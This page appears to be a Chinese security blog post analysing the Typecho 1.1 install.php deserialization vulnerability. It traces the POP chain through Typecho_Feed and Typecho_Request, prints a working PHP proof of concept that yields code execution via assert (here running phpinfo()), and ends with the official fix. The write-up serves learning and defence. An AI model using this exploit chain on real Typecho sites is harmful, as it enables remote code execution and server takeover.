<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="generator" content="Hexo 4.2.1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><meta name="keywords" content="[object Object]"><meta name="description" content="[toc]上次国赛有一道这个题，baby_serialize，看了好久也没做出来，感觉自己代码审计能力太差了，于是乎想找几个cms审审反序列化的链子，于是就有了这篇。"><meta name="author" content="Katharsis"><title>typecho反序列化利用链分析 - Kath4rs1s</title><meta description="[toc]上次国赛有一道这个题，baby_serialize，看了好久也没做出来，感觉自己代码审计能力太差了，于是乎想找几个cms审审反序列化的链子，于是就有了这篇。"><meta property="og:type" content="article"><meta property="og:title" content="typecho反序列化利用链分析"><meta property="og:url" content="http://yoursite.com/2020/09/03/typecho-1-1/"><meta property="og:site_name" content="Katharsis"><meta property="og:description" content="[toc]上次国赛有一道这个题，baby_serialize，看了好久也没做出来，感觉自己代码审计能力太差了，于是乎想找几个cms审审反序列化的链子，于是就有了这篇。"><meta property="og:locale" content="en_US"><meta property="article:published_time" content="2020-09-03T10:49:54.000Z"><meta property="article:modified_time" content="2020-09-11T02:13:22.211Z"><meta property="article:author" content="Katharsis"><meta property="article:tag" content="反序列化"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="http://yoursite.com/img/avatar.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://yoursite.com/2020/09/03/typecho-1-1/"},"headline":"typecho反序列化利用链分析","image":["http://yoursite.com/img/avatar.png"],"datePublished":"2020-09-03T10:49:54.000Z","dateModified":"2020-09-11T02:13:22.211Z","author":{"@type":"Person","name":"Katharsis"},"description":"[toc]上次国赛有一道这个题，baby_serialize，看了好久也没做出来，感觉自己代码审计能力太差了，于是乎想找几个cms审审反序列化的链子，于是就有了这篇。"}</script><link rel="alternative" href="/atom.xml" title="Kath4rs1s" type="application/atom+xml"><link rel="icon" href="/img/favicon.png"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro|Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&amp;amp;subset=latin,latin-ext|Inconsolata|Itim|Lobster.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/atom-one-dark.min.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><link rel="stylesheet" href="/css/style.css"><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="/js/globalUtils.js"></script></head><body class="is-3-column has-navbar-fixed-top"><nav class="navbar navbar-main is-fixed-top"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/123456.png" alt="Kath4rs1s" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item is-hidden-tablet catalogue" title="Catalogue" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a><a class="navbar-item" id="night-nav" title="Night Mode" href="javascript:;"><i class="fas fa-moon" id="night-icon"></i></a></div></div></div></nav><script type="text/javascript" src="/js/theme-setting.js"></script><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><i class="far fa-calendar-plus"> </i>2020-09-03  <span class="level-item"><i class="far fa-clock"> </i>7 m  <i class="fas fa-pencil-alt"> </i>1.0 k</span><span class="level-item" id="busuanzi_container_page_pv"><i class="far fa-eye"></i>&nbsp;&nbsp;<span id="busuanzi_value_page_pv">0</span> visits</span></div></div><h1 class="title is-3 is-size-4-mobile">typecho反序列化利用链分析</h1><div class="content"><p>[toc]<br>上次国赛有一道这个题，<strong>baby_serialize</strong>，看了好久也没做出来，感觉自己代码审计能力太差了，于是乎想找几个cms审审反序列化的链子，于是就有了这篇。<a id="more"></a><br>找的是typecho1.1的那个漏洞，呜呜呜太菜了，因为是第一次，还是一边看师傅博客一边完成的，此处膜拜P3师傅。因为现在的版本漏洞已经修复了，搭环境还浪费了好长时间，真的心累。</p>
<p><img src="/images/typecho1.1/20200903190745.png" alt=""></p>
<h2 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h2><p>漏洞利用的地方是在<strong>install.php</strong>，这里只是验证了一下有没有get提交finish参数，若没有则退出，有的话再继续往下进行，先看看利用点：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php else : ?&gt;</span><br><span class="line">    &lt;?php</span><br><span class="line">    $config &#x3D; unserialize(base64_decode(Typecho_Cookie::get(&#39;__typecho_config&#39;)));</span><br><span class="line">    Typecho_Cookie::delete(&#39;__typecho_config&#39;);</span><br><span class="line">    $db &#x3D; new Typecho_Db($config[&#39;adapter&#39;], $config[&#39;prefix&#39;]);</span><br><span class="line">    $db-&gt;addServer($config, Typecho_Db::READ | Typecho_Db::WRITE);</span><br><span class="line">    Typecho_Db::set($db);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>这里把从get中数据然后base64解码然后再反序列化，看一下get方法的实现：</p>
<p><img src="/images/typecho1.1/20200903191942.png" alt=""></p>
<p>这里用了一个三目运算符，如果cookie存在就从cookie中获取值，否则就从POST参数获取值。这里我们只要直接通过cookie或者post传入我们的payload就可以利用此次漏洞。</p>
<h2 id="反序列化利用链构造"><a href="#反序列化利用链构造" class="headerlink" title="反序列化利用链构造"></a>反序列化利用链构造</h2><p>因为这里是 <strong>unserialize</strong> 函数，首先我们肯定要找 <strong>__destruct()</strong> 魔术方法来利用反序列化，结果看了一圈也没有一个能用的，然后又全局搜索了 <strong>__wakeup()</strong> 方法，也是没有可以利用的。<br>然后往下看，new了一个 <strong>Typecho_Db</strong> 类，看看这个类的 <strong>__construct</strong> 。</p>
<p>db.php 114-120行：</p>
<p><img src="/images/typecho1.1/20200903192930.png" alt=""></p>
<p>可以看到这里用了字符串拼接操作，在这里可以触发 <strong>__toString()</strong> 方法，然后全局搜索__toString，在feed.php中发现可利用点。</p>
<p>feed.php 258-259行：</p>
<p><img src="/images/typecho1.1/20200903193610.png" alt=""></p>
<p>这里的 <strong>item[&#39;author&#39;]-&gt;screenName</strong> 可以触发 <strong>__get()</strong> 方法，然后全局搜索<strong>get方法，然后会在request.php中发现可以rce的</strong>get()方法。<br>首先是 </p>
<p>request.php 269-272行：</p>
<p><img src="/images/typecho1.1/20200903194148.png" alt=""></p>
<p>这里调用get函数，跟进</p>
<p>request.php 295-311行：</p>
<p><img src="/images/typecho1.1/20200903194308.png" alt=""></p>
<p>这里在最后会调用<code>_applyFilter</code>方法，看看这个方法</p>
<p>request.php 159-171行：</p>
<p><img src="/images/typecho1.1/20200903194421.png" alt=""></p>
<p>就会调用这里的call_user_func()执行函数。还要说的一个地方就是，当按照上面的所有流程构造poc之后，发请求到服务器，却会返回500。<br>原因是在install.php的开始，调用了 <strong>ob_start()</strong> ，当我们在执行的时候会触发原本的exception，导致ob_end_clean()执行，原本的缓冲区被清理。必须像一个办法下强制退出，使得代码不会执行到exception，这样原本的缓冲区数据就会被输出出来。</p>
<p>这里有两个办法。 1、因为call_user_func函数处是一个循环，我们可以通过设置数组来控制第二次执行的函数，然后找一处exit跳出，缓冲区中的数据就会被输出出来。 2、第二个办法就是在命令执行之后，想办法造成一个报错，语句报错就会强制停止，这样缓冲区中的数据仍然会被输出出来。</p>
<p>解决了这个问题，整个利用POP链就成立了<br>poc：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">class Typecho_Feed&#123;</span><br><span class="line">    private $_type &#x3D; &#39;RSS 2.0&#39;;</span><br><span class="line">    private $_charset &#x3D; &#39;UTF-8&#39;;</span><br><span class="line">    private $_lang &#x3D; &#39;zh&#39;;</span><br><span class="line">    private $_items &#x3D; array();</span><br><span class="line"></span><br><span class="line">    function __construct()&#123;</span><br><span class="line">        $this-&gt;_items[] &#x3D; [&quot;author&quot;&#x3D;&gt;new Typecho_Request(),&#39;category&#39;&#x3D;&gt;array(new Typecho_Request())];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Typecho_Request&#123;</span><br><span class="line">    private $_params &#x3D; array();</span><br><span class="line">    private $_filter &#x3D; array();</span><br><span class="line"></span><br><span class="line">    function __construct()&#123;</span><br><span class="line">        $this-&gt;_filter &#x3D; array(&quot;assert&quot;);</span><br><span class="line">        $this-&gt;_params &#x3D; [&#39;screenName&#39;&#x3D;&gt;&#39;phpinfo()&#39;];</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$config &#x3D; array(&#39;host&#39; &#x3D;&gt; &#39;localhost&#39;,&quot;adapter&quot;&#x3D;&gt;new Typecho_Feed(),&quot;prefix&quot;&#x3D;&gt;&#39;123&#39;,&quot;pop&quot;&#x3D;&gt;&#39;123&#39;);</span><br><span class="line"></span><br><span class="line">echo serialize($config);</span><br><span class="line">echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">echo base64_encode(serialize($config));</span><br></pre></td></tr></table></figure>

<p>成功执行：</p>
<p><img src="/images/typecho1.1/20200903194950.png" alt=""></p>
<h2 id="修复方法"><a href="#修复方法" class="headerlink" title="修复方法"></a>修复方法</h2><p>若是之前的版本只要删掉install.php就好了，看看官方的修复方法：</p>
<p><img src="/images/typecho1.1/20200903195426.png" alt=""></p>
<p>增加了对数据库的判断，原来finish被删掉了，这样就安全多了。</p>
</div><ul class="post-copyright"><li><strong>Post Title: </strong><a href="http://yoursite.com/2020/09/03/typecho-1-1/">typecho反序列化利用链分析</a></li><li><strong>Post Author: </strong><a href="http://yoursite.com">Katharsis</a></li><li><strong>Post Link: </strong><a href="http://yoursite.com/2020/09/03/typecho-1-1/">http://yoursite.com/2020/09/03/typecho-1-1/</a></li><li><strong>Copyright Notice: </strong><span>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> unless stating additionally.</span></li></ul><div><div class="recommend-post"><span class="is-size-6 has-text-grey has-mr-7"># Related Post</span><br><span>  1.<a class="is-size-6" href="/2020/09/16/PbootCMS-2-0-7/" target="_blank">PbootCMS2.0.7前台任意文件包含漏洞复现</a><br></span></div></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/css/share.min.css"><div class="social-share"></div><script src="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">Like this article? Support the author with</h3><div class="buttons is-centered"></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2020/09/10/ciscn-laravel1/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">ciscn2019 laravel反序列化利用链</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2020/08/27/Writeup/"><span class="level-item">一篇writeup</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1 is-sticky"><div class="card widget toc-scroll" id="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">Catalogue</h3><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-利用条件" href="#利用条件"><span>利用条件</span></a></li><li><a class="is-flex toc-item" id="toc-item-反序列化利用链构造" href="#反序列化利用链构造"><span>反序列化利用链构造</span></a></li><li><a class="is-flex toc-item" id="toc-item-修复方法" href="#修复方法"><span>修复方法</span></a></li></ul></div></div><script type="text/javascript" async>
        $(document).ready(function () { //参考自 https://github.com/ppoffice/hexo-theme-icarus/pull/616/files
            var observerTopMargin;
            var scrollObserver;
            var headerElems = $(".headerlink");
            var activeTocItem;
        
            function initIntersectionObserver(docHeight) {
                observerTopMargin = docHeight;
                scrollObserver = new IntersectionObserver(scrollCallBack,
                    {
                        root: null,  // viewpoint
                        rootMargin: docHeight + "px 0px -80% 0px"  // cover top 30% of viewport to the top of document
                    })
            }
        
            function scrollCallBack(entries, observer) {
                if ($(window).scrollTop() > observerTopMargin * 0.7) { 
                    // User somehow scroll to 70% of observerTopMargin (which is inited as 200% document height)
                    // Observer top margin need to extend to cover all the space to the top of the document
                    initIntersectionObserver(observerTopMargin * 2)
                    observer.disconnect();
                    return;
                }
                let toActive;
                if (entries[0].intersectionRatio == 1) {  // enter viewed area
                    let entry = entries.reduce((u, v) => (u.target.toc_id > v.target.toc_id ? u : v));  // get the lowest item
                    toActive = $("#toc-item-" + $(entry.target).attr("href").substr(1));
                } else {
                    let entry = entries.reduce((u, v) => (u.target.toc_id < v.target.toc_id ? u : v));  // get the highest item
                    let idx = Math.max(entry.target.toc_id - 1, 0);
                    toActive = $("#toc-item-" + $(headerElems[idx]).attr("href").substr(1));
                }
                if (activeTocItem) activeTocItem.removeClass("is-current");
                activeTocItem = toActive
                activeTocItem.addClass("is-current");
            }
        
            initIntersectionObserver($(document).height() * 2);
            headerElems.each(function (index, obj) {
                obj.toc_id = index;
                scrollObserver.observe(obj);
            })
        });</script></div><div class="card widget"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="" src="/img/avatar.png" alt="Katharsis"></figure><p class="title is-size-4 is-block line-height-inherit">Katharsis</p><p class="is-size-6 is-block">^_^</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>中国</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">19</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories"><p class="title">5</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">4</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="/" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Github" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Weibo" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Email" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Next" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="RSS" href="/null"><i></i></a></div></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/123456.png" alt="Kath4rs1s" height="28"></a><p class="size-small"><span>&copy; 2020 Katharsis</span>  Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>,Modify by <a href="https://github.com/removeif/hexo-theme-amazing" target="_blank">removeif</a> <br><span>© 版权说明：[本网站所有内容均收集于互联网或自己创作,<br />&nbsp;&nbsp;&nbsp;&nbsp;方便于网友与自己学习交流，如有侵权，请<a href="/message" target="_blank">留言</a>，立即处理]<br /></span><span><span id="statistic-times">loading...</span><script>function createTime(time) {
            var n = new Date(time);
            now.setTime(now.getTime() + 250),
                days = (now - n) / 1e3 / 60 / 60 / 24,
                dnum = Math.floor(days),
                hours = (now - n) / 1e3 / 60 / 60 - 24 * dnum,
                hnum = Math.floor(hours),
            1 == String(hnum).length && (hnum = "0" + hnum),
                minutes = (now - n) / 1e3 / 60 - 1440 * dnum - 60 * hnum,
                mnum = Math.floor(minutes),
            1 == String(mnum).length && (mnum = "0" + mnum),
                seconds = (now - n) / 1e3 - 86400 * dnum - 3600 * hnum - 60 * mnum,
                snum = Math.round(seconds),
            1 == String(snum).length && (snum = "0" + snum),
                document.getElementById("statistic-times").innerHTML = "❤️Site from <strong>"+time.split(" ")[0].replace(/\//g,".")+"</strong> has existed <strong>" + dnum + "</strong> d <strong>" + hnum + "</strong> h <strong>" + mnum + "</strong> m <strong>" + snum + "</strong> s！❤️";
        }var now = new Date();setInterval("createTime('2020/7/11 00:00:00')", 250,"");</script><br></span><div class="size-small"><span>❤️Thx <strong><span id="busuanzi_value_site_uv">99+</span></strong> users <strong><span id="busuanzi_value_site_pv">99+</span></strong> visited！❤️</span></div></p></div><div class="level-end"><div class="sideMusic"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css"><script src="/js/APlayer.min.js"></script><script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script><meting-js style="width: auto;height: 2000px;" server="netease" type="playlist" id="4978492128" theme="#2980b9" loop="all" autoplay="false" order="list" storageName="aplayer-setting" lrctype="0" list-max-height="400px" fixed="true"></meting-js></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            site: {
                url: 'http://yoursite.com',
                external_link: {"enable":true,"exclude":[]}
            },
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to Top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back-to-top.js" defer></script><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/js/lightgallery-all.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js" defer></script><!--!--><!--!--><!--!--><script src="/js/toc.js" defer></script><script src="/js/main.js" defer></script><link rel="stylesheet" href="/css/insight.css"><div class="searchbox ins-search"><div class="searchbox-container ins-search-container"><div class="searchbox-input-wrapper"><input class="searchbox-input ins-search-input" type="text" placeholder="Type something..."><span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span></div><div class="searchbox-result-wrapper ins-section-wrapper"><div class="ins-section-container"></div></div></div></div><script>(function (window) {
            var INSIGHT_CONFIG = {
                TRANSLATION: {
                    POSTS: 'Posts',
                    PAGES: 'Pages',
                    CATEGORIES: 'Categories',
                    TAGS: 'Tags',
                    UNTITLED: '(Untitled)',
                },
                CONTENT_URL: '/content.json',
            };
            window.INSIGHT_CONFIG = INSIGHT_CONFIG;
        })(window);</script><script src="/js/insight.js" defer></script></body></html>